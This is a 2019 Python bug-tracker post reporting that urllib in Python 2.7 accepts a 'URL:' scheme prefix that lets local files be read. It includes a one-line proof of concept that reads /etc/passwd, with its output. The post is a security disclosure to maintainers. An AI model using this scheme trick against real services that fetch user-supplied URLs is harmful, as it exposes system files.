[issue37820] Unnecessary URL scheme exists to allow 'URL: reading file in urllib
Abdullah
report at bugs.python.org
Sun Aug 11 07:16:29 EDT 2019
New submission from Abdullah <alchndervenix at gmail.com>:
I am not sure if this was reported before, fixed, or even how to report this. However this issue is similar to https://bugs.python.org/issue35907
# Vulnerability PoC
import urllib
print urllib.urlopen('URL:/etc/passwd').read()[:30]
the result is
##
# User Database
#
# Note t
I have tested the PoC on my Mac python 2.7.
----------
components: Library (Lib)
messages: 349385
nosy: Alyan
priority: normal
severity: normal
status: open
title: Unnecessary URL scheme exists to allow 'URL: reading file in urllib
type: security
versions: Python 2.7
_______________________________________
Python tracker <report at bugs.python.org>
<https://bugs.python.org/issue37820>
_______________________________________
More information about the Python-bugs-list
mailing list